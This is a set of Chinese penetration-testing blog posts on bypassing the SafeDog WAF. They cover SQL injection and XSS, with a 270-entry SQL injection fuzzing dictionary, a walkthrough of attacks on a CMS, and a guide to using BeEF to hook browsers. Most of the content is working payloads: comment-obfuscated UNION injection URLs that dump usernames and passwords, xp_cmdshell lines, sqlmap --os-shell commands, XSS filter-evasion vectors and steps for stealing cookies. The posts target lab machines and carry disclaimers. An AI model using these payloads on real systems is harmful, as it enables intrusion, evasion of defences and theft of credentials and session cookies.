安全狗waf绕过-sql注入 安全狗WAF绕过系列一、WAF概述WAF（Web应用防火墙）作为一种专为Web应用程序设计的安全防护工具，其核心功能在于通过实施一系列针对HTTP/HTTPS协议的安全策略，来增强Web应用的安全性。WAF内置了精心设计的检测逻辑与规则集，这些规则旨在对每一个进入系统的请求内容进行细致审查，并对任何违反安全策略的请求采取即时且有效的防御措施，从而维护Web应用环境的纯净与安全。二、WAF工作机制详解WAF的工作流程精心构建，涵盖四个关键环节：预处理、规则匹配、响应处理以及日志记录，共同编织成一张紧密的安全防护网。 预处理阶段：此阶段，WAF首先担任起“守门人”的角色，对所有进入的数据请求流量进行初步筛选，确认其是否遵循HTTP/HTTPS协议标准。紧接着，WAF会利用预设的白名单机制，快速识别并放行那些已知安全或信任的URL请求，直接引导它们进入后端Web服务器进行处理。对于未能通过白名单验证的请求，WAF则进一步深入，对其数据包进行精细解析，为后续的安全检测做准备。 规则匹配阶段：此为核心环节，WAF利用其内置的强大规则引擎，对经过解析的数据包进行深度扫描与匹配。这些规则覆盖了广泛的攻击场景与模式，包括但不限于SQL注入、跨站脚本（XSS）、命令注入等常见Web安全威胁。通过这一过程，WAF能够精准识别出潜在的恶意请求，为后续的安全响应奠定坚实基础。 响应处理阶段：基于规则匹配的结果，WAF的响应处理模块将采取针对性的防御措施。对于符合安全规则的请求，WAF会毫无阻碍地将其转发至后端Web服务器，确保用户请求得到及时响应。而对于那些被判定为恶意或异常的请求，WAF则展现出其防御实力，通过阻断请求、记录日志或触发告警等多种方式，有效遏制潜在的安全风险，保护Web应用免受侵害。 三、常见的WAF绕过姿势常见的WAF（Web应用防火墙）绕过姿势包括但不限于以下几种： 提交方式变换：许多WAF默认配置下主要对GET请求进行过滤，而忽略POST请求、Cookie、HTTP头等其他提交方式。因此，可以尝试将攻击载荷通过不同的提交方式进行发送，以绕过WAF的检测。 大小写替换和编码绕过：利用WAF规则可能不区分大小写或无法完全解析编码后的攻击载荷，通过将攻击语句中的关键字进行大小写替换或使用URL编码、Base64编码等方式进行编码，以绕过WAF的过滤规则。 事件函数变换：WAF会重点识别触发JavaScript代码执行的事件函数字段，如onclick。通过变换事件函数名称或利用其他不常见的事件函数，可以尝试绕过WAF的识别。 注释符和内联注释：使用SQL注释符（如--、#）或HTML/JavaScript注释（如<!-- -->、//）来绕过WAF对特定关键字的过滤。有时，将攻击载荷与注释符结合使用，可以欺骗WAF使其忽略部分攻击载荷。 分片传输：通过调整HTTP请求中的Content-Length头部，将攻击载荷分成多个部分发送，可能导致WAF无法完整解析请求内容，从而绕过检测。 利用WAF软肋：WAF在部署时可能因性能考虑而留下一些软肋，如对某些特殊字符或组合的检测不够严格。通过分析和测试WAF的行为，可能发现并利用这些软肋进行绕过。 爬虫白名单绕过：部分WAF提供爬虫白名单功能，通过伪装成爬虫（修改User-Agent或模拟爬虫行为）可能绕过WAF的检测。 高并发流量攻击：通过发送大量垃圾数据或高并发请求，使WAF设备进入Bypass IPS模式或达到性能极限，从而暂时或永久性地绕过WAF的防护。 请注意，上述绕过姿势仅供安全研究和教育目的使用。未经授权的渗透测试和网络攻击是非法行为，可能会对个人和组织造成严重的法律后果。在进行任何渗透测试之前，请确保已获得合法授权。四、安全狗绕过姿势环境：phpstudy—apache2.4.39安全狗官网v4.0下载（应该是最新版）：https://www.safedog.cn/website_safedog.html当然如果需要套件，我都给你准备好了关注后台回复【安全狗】即可获取，感谢宝子们一直以来的关注在开始之前，如果没有SQL注入基础的的童鞋，还请观看我的另外一篇文章，1w字超详细解析。以下内容皆使用sqli第一关进行测试测试 id=1' and 1=1http://192.168.209.131/Less-1/?id=-1' and 1=1在之前的尝试中，我们发现直接使用“and 1=1”这种方法似乎并不奏效，这很可能是因为安全狗系统识别并过滤了“and”这个词。为了更深入地了解安全狗是如何识别并拦截这类操作的，我们可以尝试将“and 1=1”进行拆分http://192.168.10.129:8080/sqli/Less-1/?id=1' and --+ http://192.168.10.129:8080/sqli/Less-1/?id=1' 1=1 --+发现两个页面均返回SQL语法错误，这表明安全狗不会单独过滤‘and’或‘1=1’。我推测它可能是识别到‘and’后紧跟空格和字符的模式。为了验证这一点，我决定进行实验。http://192.168.10.129:8080/sqli/Less-1/?id=1' and1--+ http://192.168.10.129:8080/sqli/Less-1/?id=1' and 1--+实验结果，证实了确实是and+空格+字符串的格式会被拦截。这里我们就可以开始尝试利用注释符、回车符%0a等来代替空格进行绕过了！！在此输入：http://192.168.10.129:8080/sqli/Less-1/?id=1' and/**/1=1--+发现依旧不行，打开burp suite，拦截下我们阻截的包，添加$payload到我们测试的注释符中然后点击发送到intruder模块，选择如下：然后，点击pyload，选择暴力破解（Brute forcer）：attack，开始攻击，安全狗有流量攻击的防御，后面可能会被拦截，解决办法直接重启apache服务器。好了这里测试完成了，点击length更改默认排序，我们拿每个请求成功payload（检查response即可查看是否成功，如果用户名正常显示，说明该字符payload安全狗没有进行拦截）。我们随便娶一个/!*得到payload和注释符拼接/*/!**/，这个时候and和后面的1=1之间用这个拼接的符号进行连接即可http://192.168.209.131/Less-1/?id=1' and/*/!**/1=1 --+可以绕过了order by测试，我们用之前的测试结果，利用/*/!**/这一个充当空格，测试order by 3，然后看看能否成功？http://192.168.209.131/Less-1/?id=1' order/*/!**/by 3 --+完美，接下来测试联合注入。普通测试union select：http://192.168.209.131/Less-1/?id=1' union select --+union关键字测试，有回显http://192.168.209.131/Less-1/?id=1' union --+select关键字测试，有回显http://192.168.209.131/Less-1/?id=1' select --+已知安全狗WAF对联合注入的拦截规则是识别到union select字符串。为了探索是否能利用注释符绕过这一规则，我决定采用与之前相同的方法，利用Burp进行抓包，并加强fuzz测试中的参数进行暴力破解尝试。随便选择几个1002长度的响应结果这里我们选择payload，取/!*!/，构造注释符+payload，为/*/!*!/*/，插入union和select之间，绕过成功http://192.168.5.64/Less-1/?id=1' union/*/!*!/*/select 1,2,3 --+这里还有一个思路，可以利用--+%0a这种格式通过换行继续执行，这里我们试一下看看：Tips：我的另一篇SQL注入文章有写过%0a的作用，后台回复【SQL注入】【sql】等关键字即可查看http://192.168.5.64/Less-1/?id=-1%27%20union/*!--+/*%0aselect%201,database(),3*/%20--+ 相当于在普通sql语句中的 http://192.168.5.64/Less-1/?id=-1' union/*!--+/* select 1,database(),3*/ --+尝试报数据库http://192.168.5.64/Less-1/?id=-1' union/*/!*!/*/select 1,database(),3 --+发现database()被拦截了我们把database的()给去掉http://192.168.5.64/Less-1/?id=-1' union/*/!*!/*/select 1,database,3 --+报错，此时就可以确定，安全狗应该是将database()进行检测然后我们继续使用注释符或者内联注释符看看吧：继续采用burp的fuzz测试：添加上变量扫出来4个/可以用，最简单的和之前一样，就不强调了，取注释符+payload，构造payloadhttp://192.168.5.64/Less-1/?id=-1' union/*/!*!/*/select 1,database/*////*/(),3 --+成功了！接下来一个一个关键词测试，group_concat()http://192.168.5.64/Less-1/?id=-1' union/*/!*!/*/select 1,database/*////*/(),group_concat(table_name) --+没有拦截，继续fromhttp://192.168.5.64/Less-1/?id=-1' union/*/!*!/*/select 1,database/*////*/(),group_concat(table_name) from --+informtion_schema.tables，结果就不行了http://192.168.5.64/Less-1/?id=-1' union/*/!*!/*/select 1,database/*////*/(),group_concat(table_name) from informtion_schema.tables --+测试%0ahttp://192.168.209.131/Less-1/?id=-1%27%20union/*/!*!/*/select%201,database/*////*/(),group_concat(table_name)%20from%20/*!--%20/*%0ainformation_schema.tables*/ 相当于 http://192.168.209.131/Less-1/?id=-1' union/*/!*!/*/select 1,database/*////*/(),group_concat(table_name) from /*!-- /* information_schema.tables*/测试查当前数据库的表名，前面已经测试过database()了http://192.168.209.131/Less-1/?id=-1%27%20union/*/!*!/*/select%201,database/*////*/(),group_concat(table_name)%20from%20/*!--%20/*%0ainformation_schema.tables*/where%20table_schema=database/*////*/()%20--+ 相当于 http://192.168.209.131/Less-1/?id=-1' union/*/!*!/*/select 1,database/*////*/(),group_concat(table_name) from /*!-- /* information_schema.tables*/where table_schema=database/*////*/() --+爆字段，测试到and，table_name都没拦截http://192.168.209.131/Less-1/?id=-1%27%20union/*/!*!/*/select%201,database/*////*/(),group_concat(column_name)%20from%20/*!--%20/*%0ainformation_schema.tables*/where%20table_schema=database/*////*/()%20and%20table_name%20--+ 相当于 http://192.168.209.131/Less-1/?id=-1' union/*/!*!/*/select 1,database/*////*/(),group_concat(column_name) from /*!-- /* information_schema.tables*/where table_schema=database/*////*/() and table_name --+直到table_name后面加了个=http://192.168.209.131/Less-1/?id=-1%27%20union/*/!*!/*/select%201,database/*////*/(),group_concat(column_name)%20from%20/*!--%20/*%0ainformation_schema.tables*/where%20table_schema=database/*////*/()%20and%20table_name=%20--+ 相当于 http://192.168.209.131/Less-1/?id=-1' union/*/!*!/*/select 1,database/*////*/(),group_concat(column_name) from /*!-- /* information_schema.tables*/where table_schema=database/*////*/() and table_name= --+那么开始fuzz测试爆破随便娶一个payload和注释符进行拼接，如下http://192.168.209.131/Less-1/?id=-1%27%20union/*/!*!/*/select%201,database/*////*/(),group_concat(column_name)%20from%20/*!--%20/*%0ainformation_schema.columns*/where%20table_schema=database/*////*/()%20and%20table_name/*/***/=%22users%22%20--+ 相当于 http://192.168.209.131/Less-1/?id=-1' union/*/!*!/*/select 1,database/*////*/(),group_concat(column_name) from /*!-- /* information_schema.columns*/where table_schema=database/*////*/() and table_name/*/***/="users" --+回车%0a的绕过方式http://192.168.209.131/Less-1/?id=-1%27%20union/*/!*!/*/select%201,database/*////*/(),group_concat(column_name)%20from%20/*!--%20/*%0ainformation_schema.columns*/where%20table_schema=database/*////*/()%20and%20/*!--%20/*%0atable_name*/=%22users%22%20--+ 相当于 http://192.168.209.131/Less-1/?id=-1' union/*/!*!/*/select 1,database/*////*/(),group_concat(column_name) from /*!-- /* information_schema.columns*/where table_schema=database/*////*/() and /*!-- /* table_name*/="users" --+爆数据，已知表名为users，字段为id,username,password，并设置每个字段的分隔符为-，separator '-'http://192.168.209.131/Less-1/?id=-1%27%20union/*/!*!/*/select%201,database/*////*/(),group_concat(id,username,password%20separator%20%27-%27)%20from%20/*!--%20/*%0ausers*/%20--+ 相当于 http://192.168.209.131/Less-1/?id=-1' union/*/!*!/*/select 1,database/*////*/(),group_concat(id,username,password separator '-') from /*!-- /* users*/ --+这里使用的是sqli第12关有安全狗防火墙，数据包如下uname=123")%20and%20updatexml(0x3a,concat(0x3a,(select%20user()),0x3a),0x3a)#&passwd=123&submit=Submit进行分块传输（这里用到一个插件）联系作者即可获取（备注【分块插件】）编码请求体后注意最后两行需要空着，但凡少一行都会造成请求不成功少一行之后，响应失败脏数据构造大型数据包比如但是如果没有足够大的数据包，也是不能够进行绕过的，比如数据包中post无限制，get可能会进行限制hex编码这里没有复现案例，仅供参考前提：没有过滤掉0x例如select * from users where name="admin"总结通过本文的详细解析和实验，我们深入了解了SQL注入攻击的基本原理及其在实际应用中的变种和绕过技巧。在面对如安全狗这样的WAF防护时，攻击者并非束手无策，而是可以通过多种方式绕过检测规则，成功实施SQL注入攻击。本文首先通过基础的SQL注入测试，验证了安全狗WAF对“and 1=1”等简单SQL注入模式的识别能力。随后，通过拆分和注释符的使用，我们发现WAF可能是通过识别特定模式（如“and”后紧跟空格和字符）来拦截SQL注入的。基于此发现，我们进一步尝试利用注释符、换行符等技术手段绕过WAF的检测，成功实施了更复杂的SQL注入攻击，包括联合查询注入，获取数据库表名、列名以及具体数据等。通过本文的学习，我们不仅能够加深对SQL注入攻击的理解，还能够掌握一些实用的绕过WAF防护的技巧。然而，需要强调的是，这些技巧仅用于合法的安全测试和教育目的，任何未经授权的SQL注入攻击都是非法的，并可能带来严重的法律后果。因此，我们呼吁广大开发人员和安全从业者，应持续关注和提升Web应用的安全性，共同维护网络空间的安全与稳定。免责声明：本渗透教程仅供安全研究与教育目的使用。任何未经授权的网络活动均属非法。读者应确保拥有合法权限，并对自己的行为负责。教程内容不保证绝对安全或成功，使用风险自负。

放开双手 ，SQL注入Fuzzing字典 （270个） 放开双手 ，SQL注入Fuzzing字典 （270个）什么是Fuzzing(模糊测试）？模糊测试（Fuzzing），是一种通过向目标系统提供非预期的输入并监视异常结果来发现软件漏洞的方法。字典如下：' " # - -- ' -- --'; ' ; = ' = ; = -- x23 x27 x3D x3B' x3D x27 x27x4Fx52 SELECT * x27x6Fx72 SELECT * 'or select * admin'-- ';shutdown-- <>"'%;)(&+ ' or ''=' ' or 'x'='x " or "x"="x ') or ('x'='x 0 or 1=1 ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 1=1-- " or 1=1-- ' or '1'='1'-- "' or 1 --'" or 1=1-- or%201=1 or%201=1 -- ' or 1=1 or ''=' " or 1=1 or ""=" ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a 'hi' or 'x'='x'; @variable ,@variable PRINT PRINT @@variable select insert as or procedure limit order by asc desc delete update distinct having truncate replace like handler bfilename ' or username like '% ' or uname like '% ' or userid like '% ' or uid like '% ' or user like '% exec xp exec sp '; exec master..xp_cmdshell '; exec xp_regread t'exec master..xp_cmdshell 'nslookup www.google.com'-- --sp_password x27UNION SELECT ' UNION SELECT ' UNION ALL SELECT ' or (EXISTS) ' (select top 1 '||UTL_HTTP.REQUEST 1;SELECT%20* to_timestamp_tz tz_offset &lt;&gt;&quot;'%;)(&amp;+ '%20or%201=1 %27%20or%201=1 %20$(sleep%2050) %20'sleep%2050' char%4039%41%2b%40SELECT &apos;%20OR 'sqlattempt1 (sqlattempt2) | %7C *| %2A%7C *(|(mail=*)) %2A%28%7C%28mail%3D%2A%29%29 *(|(objectclass=*)) %2A%28%7C%28objectclass%3D%2A%29%29 ( %28 ) %29 & %26 ! %21 ' or 1=1 or ''=' ' or ''=' x' or 1=1 or 'x'='y / // //* */* ' ' and '' like ' ' AnD '' like ' ' or '' like ' ' and '' like '% ' aND '' like '% ' and '' like ''-- ' and 2>1-- ' and 2>3-- ') and ('x'='x ) and (1=1 'or''=' 'or'='or' a' or 1=1-- "a"" or 1=1--" or a = a a' or 'a' = 'a 1 or 1=1 a' waitfor delay '0:0:10'-- 1 waitfor delay '0:0:10'-- declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) a' ? ' or 1=1 ‘ or 1=1 -- x' AND userid IS NULL; -- x' AND email IS NULL; -- anything' OR 'x'='x x' AND 1=(SELECT COUNT(*) FROM tabname); -- x' AND members.email IS NULL; -- x' OR full_name LIKE '%Bob% 23 OR 1=1 '; exec master..xp_cmdshell 'ping 172.10.1.255'-- ' '%20or%20''=' '%20or%20'x'='x %20or%20x=x ')%20or%20('x'='x 0 or 1=1 ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # or 0=0 #" or 0=0 # ' or 1=1-- " or 1=1-- ' or '1'='1'-- ' or 1 --' or 1=1-- or%201=1 or%201=1 -- ' or 1=1 or ''=' or 1=1 or ""= ' or a=a-- or a=a ') or ('a'='a ) or (a=a hi or a=a hi or 1=1 --" hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a "hi"") or (""a""=""a" 'hi' or 'x'='x'; @variable ,@variable PRINT PRINT @@variable select insert as or procedure limit order by asc desc delete update distinct having truncate replace like handler bfilename ' or username like '% ' or uname like '% ' or userid like '% ' or uid like '% ' or user like '% exec xp exec sp '; exec master..xp_cmdshell '; exec xp_regread t'exec master..xp_cmdshell 'nslookup www.google.com'-- --sp_password x27UNION SELECT ' UNION SELECT ' UNION ALL SELECT ' or (EXISTS) ' (select top 1 '||UTL_HTTP.REQUEST 1;SELECT%20* to_timestamp_tz tz_offset <>"'%;)(&+ '%20or%201=1 %27%20or%201=1 %20$(sleep%2050) %20'sleep%2050' char%4039%41%2b%40SELECT &apos;%20OR 'sqlattempt1 (sqlattempt2) | %7C *| %2A%7C *(|(mail=*)) %2A%28%7C%28mail%3D%2A%29%29 *(|(objectclass=*)) %2A%28%7C%28objectclass%3D%2A%29%29 ( %28 ) %29 & %26 ! %21 ' or 1=1 or ''=' ' or ''=' x' or 1=1 or 'x'='y / // //* */* a' or 3=3-- "a"" or 3=3--" ' or 3=3 ‘ or 3=3 --使用shodan查找靶机访问端口+IP打开burp suite从文件加载字典测试，直接看响应长度即可往期推荐开箱即用！265种windows渗透工具合集--灵兔宝盒我是如何利用Typora写网络安全技术文章的，公众号格子背景又是如何做到的？【kali笔记】这样炫酷的终端签名，是如何打印出来的？【内网渗透】免工具，内网、域内信息收集的40种方式总结【渗透测试】16个实用谷歌浏览器插件分享

对某CMS漏洞练习平台的一次xss、sql注入、越权黑盒思路分析 简介熊海CMS是由熊海开发的一款功能丰富的网站综合管理系统，广泛应用于个人博客、个人网站以及企业网站，本文章用于黑盒测试，如果需要源码审计后台回复【CMS】获取即可，精心准备了40多个cms源码漏洞平台，供宝子们学习，一切资源免费XSS测试在测试过程中，我们发现目标站点存在XSS注入漏洞。通过插入特定的XSS测试脚本，我们能够触发跨站脚本攻击，这表明站点在处理和显示用户输入时未进行充分的过滤和编码。SQL注入SQL注入超详细教程：从零开始学SQL注入（sql十大注入类型）：技术解析与实战演练在首页，通过随机点击一篇文章并修改URL参数，我们尝试进行SQL注入攻击。使用以下payload：http://192.168.3.245:37892/?r=content&cid=16' -- w服务器响应报错，这表明可能存在SQL注入漏洞。为了进一步验证，我们使用sqlmap工具进行自动化测试，并指定参数cid进行注入尝试：sqlmap -u 'http://192.168.3.245:37892/?r=content&cid=16' -p 'cid' --random-agent --threads=10 --dbms=mysql --level 3 --dbs测试结果显示，目标站点存在布尔盲注、报错注入和时间盲注三种SQL注入方法。接下来，我们使用dirb工具扫描目标站点的目录结构，并发现了一个admin管理页面。尝试对该admin页面进行SQL注入攻击，结果服务器响应显示SQL语句错误，进一步确认了SQL注入漏洞的存在。后台越权登录之前使用dirb扫出来的admin后台，尝试访问尽管我们尝试使用sqlmap记录来爆破admin所在的表，并发现密码进行了哈希加密，但未能使用现有的密码字典破解密码。由于无法直接登录后台，我们尝试构造session，cookie和本地存储进行越权访问。通过抓包分析，我们猜测向后端传递的用户名字段为user，密码字段为password。在设置了本地cookie存储后（随意设置），我们尝试访问后台页面：http://192.168.3.208:37892/admin/index.php成功越权访问了网站后台。在后台，我们尝试修改回复内容，并插入XSS攻击脚本：<script>alert(1)</script>保存修改后，XSS攻击脚本成功生效，表明站点存在存储型XSS注入漏洞。在尝试删除留言时，我们发现URL参数delete可能存在SQL注入漏洞。通过构造特定的payload，我们确认了该漏洞的存在。此外，我们还发现了一个报错页面，该页面暴露了站点的根目录信息，这可能会被恶意利用。由于已知目标站点为PHP网站，我们尝试使用sqlmap获取目标shell：sqlmap -u 'http://192.168.3.245:37892/?r=content&cid=16' -p 'cid' --random-agent --threads=10 --dbms=mysql --level 3 --os-shell然而，上传stager失败，可能是权限不足或目标网站的安全措施阻止了上传。修复建议更新版本：确保熊海CMS系统更新到最新版本，以修复已知的安全漏洞。SQL注入防护：对SQL语句进行预编译处理，以防止SQL注入漏洞。同时，限制数据库账号的权限，仅授予执行必要操作的最小权限，以减少SQL注入攻击的影响。XSS防护：对输出到HTML的数据进行编码处理，以防止XSS攻击。可以使用HTML实体编码或JavaScript编码来转义特殊字符。自定义错误页面：建议自定义错误页面，以避免编程语言特性导致的网站根目录泄露问题，从而减少不必要的安全风险。网安学习不迷路，技术分享，萌新答疑，一起来交流吧

【WAF剖析】10种XSS某狗waf绕过姿势 xss 基础：Web安全中的XSS攻击详细教学，Xss-Labs靶场通关全教程（建议收藏）（一）、Web安全中的XSS攻击详细教学（二）--已完结如果懒得找靶场和安全狗防火墙后台回复【靶场】即可获取image-20240722161008610复现网站安全狗最新 v4.0 已经准备好image-20240722104320515这里用 xsslab 进行 WAF 绕过测试image-20240722102257861还是一样安全狗 WAF 测试http://192.168.209.149/level1.php?name=<script>alert("hellow world")</script>image-20240722102220534基础 payloadphp<?phpecho "<script>alert(1)</script>";?>img<img src=javascript:alert("xss")><IMG SRC=javascript:alert(String.formCharCode(88,83,83))><img scr="URL" style='Xss:expression(alert(xss));'><img src="x" onerror=alert(1)><img src="x" οnerrοr=eval("alert('xss')")><img src=x οnmοuseοver=alert('xss')>css<img STYLE="background-image:url(javascript:alert('XSS'))">formXSS利用方式1<form action=javascript:alert('xss') method="get"><form action=javascript:alert('xss')>XSS利用方式2<form method=post action=aa.asp? οnmοuseοver=prompt('xss')><form method=post action=aa.asp? οnmοuseοver=alert('xss')><form action=1 οnmοuseοver=alert('xss')>input<input name="name" value=""><input value="" οnclick=alert('xss') type="text"><input name="name" value="" οnmοuseοver=prompt('xss') bad=""><input name="name" value=""><script>alert('xss')</script>iframe<iframe src=javascript:alert('xss');height=5width=1000 /><iframe><iframe src="data:text/html,&lt;script&gt;alert('xss')&lt;/script&gt;"></iframe><!--原code--><iframe src="data:text/html;base64,<script>alert('xss')</script>"><!--base64编码--><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="><iframe src="aaa" οnmοuseοver=alert('xss') /><iframe><iframe src="javascript&colon;prompt&lpar;`xss`&rpar;"></iframe>经过测试以上内容皆执行不了，但是还有一个svg没测试svg！成功了一个，看来 v4.0 的安全狗没有对 svg 进行防护，payload 如下<svg onload=alert(1)>image-20240722103703228常见的 WAF 绕过 payload1.大小写绕过<sCript>alert(1)</Script>image-202407221300440002、双写绕过image-202407221309172023、imgimage-202407221309530464、onmouseover 事件当用户鼠标移动时即可运行代码 image-20240722131108228当用户鼠标在这个块上面时即可运行（可以配合 weight 等参数将 div 覆盖页面，鼠标不划过都不行）image-202407221313538565、onclick 事件buttonimage-202407221317099956、onload 事件例如<svg onload=alert(1)>之前已经测试过了，svg 的 onoad 事件可以7、编码脚本绕过关键字image-202407221322232148、主动闭合标签实现注入代码image-202407221341403009、绕过 HTML 注释符image-2024072213461653010、利用换行符绕过image-2024072213474591411、绕过右标签image-2024072213480705012、绕过</内容>image-20240722134857902字典爆破image-20240722135712030这个时候直接一个一个去访问即可image-20240722141703806这里我们找到一个 iframe 的 payload，尝试访问，成功加载，但是看源码，标签没有闭合image-20240722141540870我们在 url 中闭合这个标签，就可以了image-20240722141917556绕过思路一、更改提交方式在默认配置下，为了节省资源，许多 WAF 只会对 GET 请求进行过滤拦截，而忽略了对 POST 请求、Cookie、HTTP Header 等其他提交方式的检测。因此，攻击者可以尝试更改有害语句的提交方式，如将 GET 请求修改为 POST 请求，或者通过 Cookie、HTTP Header 等方式提交恶意脚本，以绕过 WAF 的拦截。二、混淆伪装绕过混淆伪装是一种常见的绕过 WAF 的手段，攻击者通过编码、大小写混淆、双写、转义字符等方式对恶意脚本进行伪装，使其绕过 WAF 的关键词过滤规则。例如，将 javaScript 代码中的关键字进行大小写混淆（如三、标签和事件函数变换XSS 攻击主要是通过触发 HTML 标签中的事件函数来执行恶意脚本。因此，WAF 会重点识别能够触发事件函数的 HTML 标签和事件函数字段。攻击者可以尝试使用其他可以执行 javaScript 代码的 HTML 标签（如 , , 等）替换常用的四、利用 WAF 的缺陷和配置不当「增加 WAF 负担」：有些 WAF 在处理大量数据时可能会降低检测精度或放弃检测部分数据包。攻击者可以通过向 WAF 发送大量正常数据包并夹杂异常数据包的方式，增加 WAF 的负担，从而绕过 WAF 的检测。「利用 WAF 配置不当」：WAF 的配置可能存在漏洞或不当之处，如只检测部分参数、忽略某些类型的请求等。攻击者可以通过分析 WAF 的配置规则，构造绕过 WAF 检测的请求。「旁站绕过」：在某些情况下，网站管理员可能只对主站进行了 WAF 防护，而忽略了旁站或子域名的防护。攻击者可以尝试通过旁站或子域名绕过 WAF 的防护。五、使用自动化工具自动化工具如XSStrike 等可以帮助攻击者自动测试 WAF 的防护效果，并生成绕过 WAF 的 payload。这些工具通常包含多种绕过 WAF 的技巧和策略，可以显著提高攻击的成功率。❝XSStrike 开源地址：https://github.com/s0md3v/XSStrike❞六、其他技巧「利用伪协议」：某些 HTML 属性支持伪协议（如javascript: ），攻击者可以利用这些属性执行恶意脚本。「利用 CSS 跨站」：在某些情况下，攻击者可以利用 CSS 中的某些特性（如expression() ）执行 JavaScript 代码。「利用全局变量和函数」：JavaScript 中的全局变量和函数（如eval() , window.onload 等）可以在不直接引用脚本标签的情况下执行代码，攻击者可以尝试利用这些变量和函数绕过 WAF 的防护。七、举例这里我就拿标签事件函数变换来举例、首先判断标签名称，是否可用比如iframe ，它可以正常访问，说明 标签没有进行过滤http://192.168.209.149/level1.php?name=<iframe>image-20240722143819570标签没有进行过滤，尝试闭合这个标签，ok 正常访问image-20240722144155301判断属性 src，好没有过滤image-20240722144230962加了个= 就被拦截了，这时候没法继续了，换个事件试试image-20240722144259675image-20240722144611518这里拿 onload 尝试image-20240722144645731❝需要注意的是，以上绕过 WAF 的思路和技巧仅供学习和研究网络安全使用，不得用于非法攻击和破坏活动。在实际应用中，网站管理员和 WAF 开发者应不断更新和完善 WAF 的防护策略，提高网站的安全性。❞SQL 注入 WAF 绕过文章参考：SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细、SQL注入某狗WAF绕过（补充） 

Kali下安装与使用BeEF-xss 早八人，护网在即，该学习了~前言BEEFXSS（Browser Exploitation Framework XSS），更常见的称呼是BeEF（The Browser Exploitation Framework），是一个开源的浏览器漏洞利用框架。它由Michał Zalewski于2006年创建，旨在帮助渗透测试人员评估Web浏览器的安全性，发现并利用其中的漏洞。xss基础篇：https://mp.weixin.qq.com/s/RJcOZuscU07BEPgK89LSrQxssWAF绕过篇：https://mp.weixin.qq.com/s/P2AX2ebnzaCw-NoNwLwIRA工具使用更新源apt-get update 安装apt-get install beef-xss 输入账号密码，本身默认的密码和账号分别为 beef 和 beef启动beef-xss得到js文件攻击载荷即XSS的js脚本地址，链接为你的IP地址+端口下的js访问面板 http://:3000/ui/panl账号：beef， 密码：是你在上面输入的密码（这里我输入的是：root）存储型xss利用，当然也可以使用其他具有xss漏洞的平台，比如xsslabs使用script标签链接你攻击机器的脚本地址，提交即可好，找到一个具有xss漏洞的界面，执行script这里已成功上限log日志，获取浏览器的基本信息，当前在哪个页面，是否聚焦，鼠标在那个位置等等获取cookie选中靶机，在Command面板找到GetCookie命令并执行，比如获取cookie，这里直接获取到了cookie信息配合钓鱼重定向，即你访问具有存储型XSS的界面的时候，他会自动跳转到你预设的链接（钓鱼）地址引导下载当然也可以将跳转的链接转化为图片，比如使用img标签，链接到这个图片如果payload过长输入不了就可以使用短链、短链生成一些好玩的命令命今颜色(Color):绿色对目标主机生效并且不可见(不会被发现)橙色对目标主机生效但可能可见(可能被发现)灰色对目标主机来未必生效(可验证下)红色对目标主机不生效beef-xss主要模块Browser：此模块主要针对浏览器进行信息收集或攻击。其子选项卡“Hooked Domain”能够获取HTTP属性值，如cookie、表单值等，并执行简单的浏览器操作，例如替换href值、弹出警告框、重定向浏览器等。部分模块会根据受害者的浏览器类型来决定是否显示，主要涉及浏览器通用操作和其他基本信息检测。Chrome Extensions：此模块专门针对谷歌浏览器的扩展插件进行信息收集或攻击。Debug：提供调试功能，用于测试和修复Beef框架中的问题。Exploits：此模块利用已公开的漏洞进行攻击测试，帮助用户了解系统或应用的安全性。Host：针对主机进行信息收集，如检测主机的浏览器、系统信息、IP地址、安装软件等。IPEC：负责协议间通信，主要用于连接和控制受害者的浏览器。Metasploit：Beef可与Metasploit平台联合配置，一旦有受害者出现，可通过信息收集确定是否存在漏洞，进一步方便进行Metasploit攻击测试。Misc：包含一些杂项功能，提供额外的工具和选项。Network：进行网络扫描，帮助用户了解网络环境和潜在的安全风险。Persistence：维护受害者访问，确保长时间对受害者进行监控和控制。Phonegap：针对手机设备进行测试，帮助用户了解移动设备的安全性。Social Engineering：利用社会工程学方法进行攻击，通过诱导、欺骗等手段获取受害者的敏感信息或执行恶意操作。听说护网很激烈啊ოර⌄රო ~~~~